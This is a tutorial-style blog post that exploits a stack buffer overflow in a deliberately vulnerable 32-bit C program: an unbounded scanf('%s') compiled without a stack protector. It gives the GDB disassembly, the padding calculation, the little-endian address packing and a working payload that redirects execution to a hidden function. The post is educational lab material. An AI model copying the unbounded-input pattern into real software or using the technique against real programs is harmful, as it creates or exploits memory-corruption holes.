Exploiting a buffer overflow vulnerability

A common programming mistake is failing to check the size of a user’s input before copying it into a fixed-size memory buffer. This is commonly referred to as a buffer overflow vulnerability. This post shows how to exploit one for fun and profit.

Things you’ll need to follow along

If you want to follow along with this tutorial-style blog post you will need the following: a Linux-based operating system with GCC, the gcc-multilib package (for building 32-bit binaries), GDB, objdump, and Python3; a working knowledge of C and x86 assembly (and how CPUs work); and some comfort with the command line.

Our vulnerable program written in C

Our program has a main() function that calls our function echo(). There’s also a function called secretFunction() that we don’t want our users to know about until the next release of the program. It only has some placeholder code for the time being, but it is still a secret.

This program was compiled using GCC with the following flags: gcc -fno-stack-protector -m32 program.c. These flags produce a 32-bit binary without stack smashing protection.

If you’re unfamiliar with this functionality, GCC’s stack protector option is described as follows:

“Emit extra code to check for buffer overflows, such as stack smashing attacks. This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.”

This behavior is useful for preventing stack smashing attacks and benefits the projects that take advantage of it. However, it makes showcasing a vulnerability more difficult, and many real-world projects disable it anyway because of compatibility issues with other libraries, so our program still resembles a real-world program.

There is a dangerous flaw in how this program processes user input: it uses the scanf() function from C’s standard library (what could possibly go wrong?).

Review the following C code:

// program credit goes to Dhaval Kapil, check out his blog post https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
#include <stdio.h>

// Never called by main() or echo(); reaching it is the goal of the exploit.
void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    // Vulnerable on purpose: "%s" places no limit on how much is written to buffer.
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main()
{
    echo();

    return 0;
}

The bug in our program

If you haven’t guessed by now, scanf() with a bare %s does not check the length of the input against the size of the buffer, meaning that a user can enter too much data and overflow its allocated memory. Let’s take advantage of this to call another function.
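To make the idea concrete before touching the real binary, here is a toy model in Python. It is only a sketch: the layout (a 20-byte buffer with a 4-byte slot directly behind it) and the names unchecked_copy and frame are made up for illustration, and the real stack frame has a few more bytes in between.

```python
# Toy model of an unchecked copy. The layout is hypothetical and simplified;
# it is not the real stack frame of echo().
BUFFER_SIZE = 20


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of frame without checking BUFFER_SIZE."""
    frame[0:len(data)] = data


# A 20-byte buffer followed by a 4-byte slot standing in for the return address.
frame = bytearray(BUFFER_SIZE) + bytearray(b"RETN")

# 24 bytes of input: the last 4 spill past the buffer into the slot behind it.
unchecked_copy(frame, b"A" * BUFFER_SIZE + b"EVIL")

print(bytes(frame[BUFFER_SIZE:]))  # the slot now holds attacker-chosen bytes
```

The slot that used to hold RETN ends up holding whatever the input put there, which is the whole trick behind the exploit that follows.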

Creating the payload

To create a payload, we need to determine how many padding characters it takes to reach the saved return address of echo(), and then append the address we want to return to instead. The disassembly of echo() tells us where the buffer sits relative to that return address.

If you’re unaware of this already, memory addresses are usually written in hexadecimal (base 16), which converts easily to decimal (base 10) or binary (base 2). Addresses are just numbers, so you can use them in arithmetic expressions.

Consider the following disassembly dump from GDB:
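A quick way to get comfortable with this is to try it in Python, which accepts hexadecimal literals directly. The snippet below is just an illustration; the variable names are made up, and the two values are taken from the GDB dump of echo() in this post.

```python
# Addresses are plain integers; hex is just a notation for them.
echo_start = 0x565561f5      # address shown at <+0> in the GDB dump of echo()
ret_addr = echo_start + 85   # GDB's <+85> is an offset from the function start

print(hex(ret_addr))         # 0x5655624a, the address of the ret instruction
print(ret_addr)              # 1448436298, the same address in decimal
print(int("1c", 16))         # 28, a hex string converted to decimal
print(bin(0x1c))             # 0b11100, the same number in binary
```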

(gdb) disassemble echo
Dump of assembler code for function echo:
0x565561f5 <+0>: push ebp
0x565561f6 <+1>: mov ebp,esp
0x565561f8 <+3>: push ebx
0x565561f9 <+4>: sub esp,0x24
0x565561fc <+7>: call 0x565560c0 <__x86.get_pc_thunk.bx>
0x56556201 <+12>: add ebx,0x2dff
0x56556207 <+18>: sub esp,0xc
0x5655620a <+21>: lea eax,[ebx-0x1fbb]
0x56556210 <+27>: push eax
0x56556211 <+28>: call 0x56556040 <puts@plt>
0x56556216 <+33>: add esp,0x10
0x56556219 <+36>: sub esp,0x8
0x5655621c <+39>: lea eax,[ebp-0x1c]
0x5655621f <+42>: push eax
0x56556220 <+43>: lea eax,[ebx-0x1faa]
0x56556226 <+49>: push eax
0x56556227 <+50>: call 0x56556060 <__isoc99_scanf@plt>
0x5655622c <+55>: add esp,0x10
0x5655622f <+58>: sub esp,0x8
0x56556232 <+61>: lea eax,[ebp-0x1c]
0x56556235 <+64>: push eax
0x56556236 <+65>: lea eax,[ebx-0x1fa7]
0x5655623c <+71>: push eax
0x5655623d <+72>: call 0x56556030 <printf@plt>
0x56556242 <+77>: add esp,0x10
0x56556245 <+80>: nop
0x56556246 <+81>: mov ebx,DWORD PTR [ebp-0x4]
0x56556249 <+84>: leave
0x5655624a <+85>: ret
End of assembler dump.

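To determine the amount of padding we need, look at where the buffer sits on the stack. The instruction at <+39>, lea eax,[ebp-0x1c], loads the address of buffer as the argument for scanf(), so the buffer starts 0x1c (28) bytes below the saved EBP. The saved EBP takes up another 4 bytes, and the return address sits directly after it, so 28 + 4 = 32 bytes have to be written before the return address is reached. We type 31 of them as the padding aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; the 32nd is supplied by the first character of the address, which is not ASCII and reaches the program as two bytes on a UTF-8 terminal.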
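As a cross-check, the frame layout implied by the disassembly can be added up in Python. This is a sketch with made-up constant names; the values are read off the push ebx, lea eax,[ebp-0x1c] and mov ebx,DWORD PTR [ebp-0x4] instructions above, plus the 20-byte buffer from the C source. The result is the number of bytes the program must receive ahead of the address (which can differ from the number of characters typed if any of them are non-ASCII).

```python
# Frame layout of echo() as implied by the disassembly (32-bit x86).
BUFFER_OFFSET_FROM_EBP = 0x1c   # lea eax,[ebp-0x1c]: buffer starts here
BUFFER_SIZE = 20                # char buffer[20]
SAVED_EBX_SIZE = 4              # push ebx, restored from [ebp-0x4]
SAVED_EBP_SIZE = 4              # push ebp at function entry

# Bytes between the start of the buffer and the saved return address.
bytes_before_ret = BUFFER_OFFSET_FROM_EBP + SAVED_EBP_SIZE

# Whatever lies between the end of the buffer and the saved EBX is unused.
unused_gap = BUFFER_OFFSET_FROM_EBP - BUFFER_SIZE - SAVED_EBX_SIZE

print(bytes_before_ret)  # 32
print(unused_gap)        # 4
```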

We now need to add our return address to the end of the payload. We can use GDB to find it:

(gdb) info address secretFunction
Symbol "secretFunction" is at 0x565561b9 in a file compiled without debugging.

We can convert this address into the form used in our payload with Python3. x86 processors are little endian, so an address is stored least significant byte first: we take two hex digits (one byte) at a time starting from the end of the address, b9 61 55 56, put each of those behind 0x, and let the Python interpreter do its magic.

>>> chr(0x56)
'V'
>>> chr(0x55)
'U'
>>> chr(0x61)
'a'
>>> chr(0xb9)
'¹'
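The same byte reordering can also be done in one step with Python's struct module, which avoids reversing the address by hand. This is an alternative sketch, not the method used in this post; "<I" means a little-endian unsigned 32-bit integer.

```python
import struct

secret_addr = 0x565561b9  # address of secretFunction reported by GDB

# Pack the address as 4 bytes, least significant byte first.
packed = struct.pack("<I", secret_addr)

print(packed)           # b'\xb9aUV'
print(packed.hex(" "))  # b9 61 55 56
```

Unpacking with struct.unpack("<I", packed) gives the original address back, which is a handy sanity check.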

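This address is represented in our payload as ¹aUV, for a final payload of aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV. Every character we enter is stored in memory as its byte value, so once the input runs past the end of the buffer, the characters ¹aUV overwrite the saved return address with the bytes b9 61 55 56, which the CPU reads back as 0x565561b9. One detail matters here: ¹ is not an ASCII character, and a UTF-8 terminal sends it as the two bytes c2 b9. The extra c2 byte lands in the last byte before the return address, which is why the payload lines up with 31 a characters.

If you have a big endian processor and are following along, take a look at Wikipedia’s article on Endianness and see if you can figure out what you need to change.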
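To see exactly which bytes the program receives, the typed payload can be encoded in Python. The sketch below assumes the terminal uses UTF-8; the variable names are made up, and the offset of 32 comes from the lea eax,[ebp-0x1c] instruction in the disassembly (0x1c bytes up to the saved EBP, plus 4 bytes for the saved EBP itself).

```python
import struct

# The payload as typed at the prompt; "\u00b9" is the superscript-one character.
typed = "a" * 31 + "\u00b9aUV"

# What a UTF-8 terminal actually sends to the program.
sent = typed.encode("utf-8")

print(len(typed), len(sent))  # 35 36
print(sent[-5:].hex(" "))     # c2 b9 61 55 56

# The return address slot starts 0x1c + 4 = 32 bytes into the buffer.
RET_OFFSET = 0x1c + 4
print(sent[RET_OFFSET:RET_OFFSET + 4] == struct.pack("<I", 0x565561b9))  # True
```

On a terminal with a single-byte encoding such as Latin-1 the same keystrokes would produce one byte fewer, so building the payload from raw bytes (32 padding bytes followed by the packed address) is the more predictable route.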

Results

What happens when we run our payload? Check it out:

(gdb) run
Enter some text:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹aUV
Congratulations!
You have entered in the secret function!

Program received signal SIGSEGV, Segmentation fault.
0xf7fc2000 in ?? () from /lib32/libc.so.6

The program ran and accepted our input, the vulnerability introduced by scanf() was exploited, and we reached secretFunction(). Because we got there through an exploit rather than a normal call, there is no valid return address waiting on the stack, so without a more complex payload the application crashes with a segmentation fault once secretFunction() returns. By that point, however, your task has been accomplished and the crash is no longer relevant to you.